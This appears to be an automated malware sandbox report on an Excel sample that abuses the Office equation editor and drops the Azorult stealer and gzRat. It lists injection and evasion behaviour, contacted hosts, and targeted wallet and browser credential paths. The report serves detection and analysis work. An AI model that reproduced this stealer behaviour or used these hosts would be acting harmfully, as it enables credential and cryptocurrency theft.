              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2128Thread sleep time: -300000s >= -30000sJump to behavior
              Source: C:\Users\Public\vbc.exe TID: 380Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Users\Public\vbc.exe TID: 2528Thread sleep count: 33 > 30Jump to behavior
              Source: C:\Users\Public\vbc.exe TID: 2528Thread sleep time: -33000s >= -30000sJump to behavior
              Source: C:\Users\Public\vbc.exe TID: 2832Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\timeout.exe TID: 840Thread sleep count: 161 > 30Jump to behavior
              Source: C:\Users\Public\vbc.exe TID: 1472Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe TID: 1944Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\timeout.exe TID: 2188Thread sleep count: 152 > 30Jump to behavior
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\softokn3.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\nssdbm3.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\freebl3.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00416740 GetSystemInfo,9_2_00416740
              Source: C:\Users\Public\vbc.exeCode function: 9_2_004098A0 FindFirstFileW,FindNextFileW,FindClose,9_2_004098A0
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW,9_2_00408D44
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0041303C FindFirstFileW,FindNextFileW,FindClose,9_2_0041303C
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040989F FindFirstFileW,FindNextFileW,FindClose,9_2_0040989F
              Source: C:\Users\Public\vbc.exeCode function: 9_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,9_2_004111C4
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,9_2_00414408
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,9_2_00414408
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,9_2_00412D70
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,9_2_00412D70
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW,9_2_00408D3C
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,9_2_00412D70
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0041158C FindFirstFileW,FindNextFileW,FindClose,9_2_0041158C
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00411590 FindFirstFileW,FindNextFileW,FindClose,9_2_00411590
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,9_2_00412D9C
              Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040B15C LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,9_2_0040B15C
              Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00407A34 mov eax, dword ptr fs:[00000030h]9_2_00407A34
              Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Injects a PE file into a foreign processes
              Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
              Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20Jump to behavior
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeQueries volume information: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe VolumeInformationJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: GetLocaleInfoA,9_2_00404B4C
              Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00404C15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,9_2_00404C15
              Source: C:\Users\Public\vbc.exeCode function: 9_2_004065CC GetUserNameW,9_2_004065CC

              Stealing of Sensitive Information

              barindex
              Yara detected Azorult
              Source: Yara matchFile source: 9.0.vbc.exe.400000.15.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.13.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.3483f30.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.15.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.13.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.608258288.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.601844130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.677445164.0000000004BC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.602321607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.603363406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.677477720.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.602874997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.606811341.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.676901801.0000000004850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2640, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1868, type: MEMORYSTR
              Yara detected Azorult Info Stealer
              Source: Yara matchFile source: 9.0.vbc.exe.400000.15.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.13.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.3483f30.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.15.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.vbc.exe.400000.13.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.608258288.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.601844130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.602321607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.603363406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.602874997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.606811341.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2640, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1868, type: MEMORYSTR
              Yara detected gzRat
              Source: Yara matchFile source: 4.2.vbc.exe.55b0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.55b0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.33694d0.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.33694d0.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.608692575.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: vbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
              Source: vbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
              Source: vbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
              Source: vbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
              Source: vbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
              Source: vbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
              Source: vbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
              Source: vbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
              Source: vbc.exe, 00000004.00000002.608692575.00000000055B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
              Source: vbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets\
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: Yara matchFile source: 9.2.vbc.exe.4438750.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vbc.exe.44c5e8e.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vbc.exe.445a73d.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1868, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected gzRat
              Source: Yara matchFile source: 4.2.vbc.exe.55b0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.55b0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.33694d0.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.33694d0.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.608692575.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Native API              		1
              Registry Run Keys / Startup Folder              		1
              Extra Window Memory Injection              		11
              Disable or Modify Tools              		1
              OS Credential Dumping              		1
              Account Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium13
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts13
              Exploitation for Client Execution              		Boot or Logon Initialization Scripts111
              Process Injection              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory2
              File and Directory Discovery              		Remote Desktop Protocol2
              Data from Local System              		Exfiltration Over Bluetooth2
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts1
              Command and Scripting Interpreter              		Logon Script (Windows)1
              Registry Run Keys / Startup Folder              		2
              Obfuscated Files or Information              		Security Account Manager25
              System Information Discovery              		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
              Non-Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
              Software Packing              		NTDS1
              Security Software Discovery              		Distributed Component Object ModelInput CaptureScheduled Transfer123
              Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Timestomp              		LSA Secrets1
              Process Discovery              		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Extra Window Memory Injection              		Cached Domain Credentials21
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items111
              Masquerading              		DCSync1
              System Owner/User Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
              Virtualization/Sandbox Evasion              		Proc Filesystem1
              Remote System Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)111
              Process Injection              		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 579140 Sample: Scanjet 23002022.xlsx Startdate: 26/02/2022 Architecture: WINDOWS Score: 100 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 20 other signatures 2->63 8 EQNEDT32.EXE 12 2->8         started        13 EXCEL.EXE 33 27 2->13         started        15 Pthmzffh.exe 1 2->15         started        process3 dnsIp4 53 192.210.218.119, 49165, 80 AS-COLOCROSSINGUS United States 8->53 37 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 8->37 dropped 39 C:\Users\Public\vbc.exe, PE32 8->39 dropped 67 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->67 17 vbc.exe 13 3 8->17         started        41 C:\Users\user\...\~$Scanjet 23002022.xlsx, data 13->41 dropped 22 cmd.exe 15->22         started        file5 signatures6 process7 dnsIp8 51 etapackbg.com 172.67.166.49, 49166, 80 CLOUDFLARENETUS United States 17->51 35 C:\Users\user\AppData\...\Pthmzffh.exe, PE32 17->35 dropped 65 Injects a PE file into a foreign processes 17->65 24 vbc.exe 59 17->24         started        29 cmd.exe 17->29         started        31 timeout.exe 22->31         started        file9 signatures10 process11 dnsIp12 55 clamprite.ga 80.66.64.174, 49167, 49169, 80 VAD-SRL-AS1MD Russian Federation 24->55 43 C:\Users\user\AppData\...\vcruntime140.dll, PE32 24->43 dropped 45 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32 24->45 dropped 47 C:\Users\user\AppData\Local\...\softokn3.dll, PE32 24->47 dropped 49 45 other files (none is malicious) 24->49 dropped 69 